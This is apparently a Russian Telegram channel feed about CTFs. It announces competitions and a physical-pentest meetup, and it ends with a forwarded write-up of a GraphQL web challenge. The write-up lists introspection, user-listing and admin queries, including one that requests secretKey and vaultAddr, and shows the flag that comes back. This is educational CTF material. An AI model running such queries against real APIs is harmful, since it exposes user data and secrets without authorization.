Forwarded from TaipanByte CTF
Анонсируем
TaipanByte’s Chart CTF!🤩
📅 Когда:
14 февраля 2026, 10:00 UTC — 15 февраля 2026, 10:00 UTC
➡️ Где:
https://chart.taipanbyte.ru/
(Подробная информация на CTFtime)
➡️ Формат:
Jeopardy (Task-Based)
😀 Что за CTF:
TaipanByte’s Chart CTF — это онлайн-соревнование по информационной безопасности от нашей команды - TaipanByte. В фокусе мероприятия — задачи по различным направлениям, включая Beginners, GEOINT, OSINT, Misc и Crypto.
📱 Канал |🐍 CTF Платформа
TaipanByte’s Chart CTF!
📅 Когда:
14 февраля 2026, 10:00 UTC — 15 февраля 2026, 10:00 UTC
https://chart.taipanbyte.ru/
(Подробная информация на CTFtime)
Jeopardy (Task-Based)
TaipanByte’s Chart CTF — это онлайн-соревнование по информационной безопасности от нашей команды - TaipanByte. В фокусе мероприятия — задачи по различным направлениям, включая Beginners, GEOINT, OSINT, Misc и Crypto.
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥9 1
Райтапы по CTF{2026}
Закрыли регистрацию!
Желающих очень много, ОЧЕНЬ!
За 3 дня до мероприятия вам придет подтверждение с подробной информацией
Всем спасибо, постараемся сделать запись митапа
P.S:
Если у кого-то есть петлички и оборудование и он готов нам в этом помочь в организации записил или онлайн трансляции, напишите @freenameruuuu
💬 Канал & Чат | 📺 RUTUBE | 📺 YouTube
Желающих очень много, ОЧЕНЬ!
За 3 дня до мероприятия вам придет подтверждение с подробной информацией
Всем спасибо, постараемся сделать запись митапа
P.S:
Если у кого-то есть петлички и оборудование и он готов нам в этом помочь в организации записил или онлайн трансляции, напишите @freenameruuuu
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥10❤2
Please open Telegram to view this post
VIEW IN TELEGRAM
Please open Telegram to view this post
VIEW IN TELEGRAM
❤41🔥22 4😱2 1
Райтапы по CTF{2026}
Please open Telegram to view this post
VIEW IN TELEGRAM
1🔥68❤15 6 1
💥 Записали митап по физическому пентесту — теперь всё лежит на RUTUBE.
29 января мы собрались в офисе Solar в Москве и поговорили про полный цикл физического пентеста: от OSINT и подготовки легенды до проникновения в офис и использования железа вроде O.MG Cable.
В плейлисте три доклада:
🔹 Егор Зайцев (@pro_pentest) — «Физический пентест: от OSINT до полной компрометации компании»
🔹 Андрей Зенин (Бастион) — «Физический пентест: этапы, практика и реальные кейсы»
🔹 Александр Хабибуллин (CyberOK) — «O.MG Cable: доверие к USB обернулось атакой»
Если интересен реальный физический редтимминг, социальная инженерия и практические кейсы с полей — залетай смотреть.
👉 Плейлист тут:
https://rutube.ru/plst/1456882/
💬 Канал & Чат | 📺 RUTUBE | 📺 YouTube
29 января мы собрались в офисе Solar в Москве и поговорили про полный цикл физического пентеста: от OSINT и подготовки легенды до проникновения в офис и использования железа вроде O.MG Cable.
В плейлисте три доклада:
🔹 Егор Зайцев (@pro_pentest) — «Физический пентест: от OSINT до полной компрометации компании»
🔹 Андрей Зенин (Бастион) — «Физический пентест: этапы, практика и реальные кейсы»
🔹 Александр Хабибуллин (CyberOK) — «O.MG Cable: доверие к USB обернулось атакой»
Если интересен реальный физический редтимминг, социальная инженерия и практические кейсы с полей — залетай смотреть.
👉 Плейлист тут:
https://rutube.ru/plst/1456882/
Please open Telegram to view this post
VIEW IN TELEGRAM
RUTUBE
Физический пентест: кейсы, инструменты, практика 29.01.2026 – смотреть плейлист, все 3 видео подборки от "Райтапы по CTF{2026}"…
Физический пентест: кейсы, инструменты, практика 29.01.2026 подготовил для Вас 3 видеороликов - смотри онлайн бесплатно!
❤20
А еще, райтапы от организаторов будут в нашем канале сразу после мероприятия...
Please open Telegram to view this post
VIEW IN TELEGRAM
Telegram
DUCKERZ
🚩 DUCKERZ CTF
Зима в самом разгаре, а значит настало время для DUCKERZ CTF, онлайн соревнования по информационной безопасности от нашей команды.
🐥Формат task-based
🐥Команды до 5 человек
🐥С 12:00 7 февраля по 12:00 8 февраля (МСК)
Участвовать могут все…
Зима в самом разгаре, а значит настало время для DUCKERZ CTF, онлайн соревнования по информационной безопасности от нашей команды.
🐥Формат task-based
🐥Команды до 5 человек
🐥С 12:00 7 февраля по 12:00 8 февраля (МСК)
Участвовать могут все…
❤14🔥7 6
Райтапы по CTF{2026}
💥 Записали митап по физическому пентесту — теперь всё лежит на RUTUBE. 29 января мы собрались в офисе Solar в Москве и поговорили про полный цикл физического пентеста: от OSINT и подготовки легенды до проникновения в офис и использования железа вроде O.MG…
Друзья, я знаю, что вам не хватило времени задать свои вопросы Егору, и именно поэтому мы решили провести СТРИМ-поскриптум, где ответим на всё, что вас интересует!
Форма, куда можно отправить свой вопрос:
https://forms.yandex.ru/u/6984a1da90fa7b1a56545f8c/
На всякий случай — запись доклада для тех, кто ещё не посмотрел:
https://rutube.ru/video/a54900346f6b71186397e2e232839c18/
Стрим проведём 13 февраля — включайте уведомления, чтобы не пропустить!
💬 Канал & Чат | 📺 RUTUBE | 📺 YouTube
Форма, куда можно отправить свой вопрос:
https://forms.yandex.ru/u/6984a1da90fa7b1a56545f8c/
На всякий случай — запись доклада для тех, кто ещё не посмотрел:
https://rutube.ru/video/a54900346f6b71186397e2e232839c18/
Стрим проведём 13 февраля — включайте уведомления, чтобы не пропустить!
Please open Telegram to view this post
VIEW IN TELEGRAM
1❤14 5 3
Forwarded from InfoSec VK Hub
Всем привет!
А вот и финальный разбор в нашей серии! Последний пазл, флаг за который дал целых 400 очков. Иногда самая простая ошибка — оставить introspection в GraphQL — становится очень дорогой...
Persik ICO Writeup
Проверим включена ли introspection:
Из схемы составим query getEligibleUsers и получим список список адресов участников airdrop'а:
Выберем любой адрес и передадим его в checkAirdrop:
Опционально можно было использовать адрес администратора из admin query:
На этом серия разборов подходит к концу. Мы прошли путь от базовых уязвимостей до тонкостей GraphQL, где одна невыключенная настройка открыла доступ ко всей логике и данным сервиса. Этот таск — отличное напоминание: безопасность API часто ломается на самых простых вещах: забытых отладочных интерфейсах, излишней детализации ошибок или избыточных правах.
Предыдущие разборы серии:
1 часть
2 часть
3 часть
VK Security | Буст этому каналу
#разбор #CTF
А вот и финальный разбор в нашей серии! Последний пазл, флаг за который дал целых 400 очков. Иногда самая простая ошибка — оставить introspection в GraphQL — становится очень дорогой...
Persik ICO Writeup
category: web, points: 400
Airdrop токена Persik уже прошёл, а вы - опоздали ... но сервис хранит больше данных, чем должен!
Достаньте любой eligible-адрес и заберите флаг
После подключения кошелька видно, что для проверки участвует ли адрес в airdrop'е отсылается GraphQL query checkAirdrop на эндпойнт /graphql. Увидим, что по этому пути нам доступен GraphiQL.
Проверим включена ли introspection:
query { __schema { types { name kind fields { name type { name kind } } } } }
Из схемы составим query getEligibleUsers и получим список список адресов участников airdrop'а:
query GetEligibleUsers { getEligibleUsers { address tokensClaimed airdropEligible } }
Выберем любой адрес и передадим его в checkAirdrop:
query CheckAirdrop($addr: String!) { checkAirdrop(address: $addr) { address tokensClaimed airdropEligible flag } }
И получим флаг:
{
"data": {
"checkAirdrop": {
"address": "0x8ba1f109551bD432803012645aac136c22C19e00",
"tokensClaimed": 3000,
"airdropEligible": true,
"flag": "vkctf{edd3417a9eb5c85b361d196e504b05a0}"
}
}
}
Опционально можно было использовать адрес администратора из admin query:
query AdminInfo { admin { secretKey vaultAddr } }
На этом серия разборов подходит к концу. Мы прошли путь от базовых уязвимостей до тонкостей GraphQL, где одна невыключенная настройка открыла доступ ко всей логике и данным сервиса. Этот таск — отличное напоминание: безопасность API часто ломается на самых простых вещах: забытых отладочных интерфейсах, излишней детализации ошибок или избыточных правах.
Предыдущие разборы серии:
1 часть
2 часть
3 часть
VK Security | Буст этому каналу
#разбор #CTF
❤9 4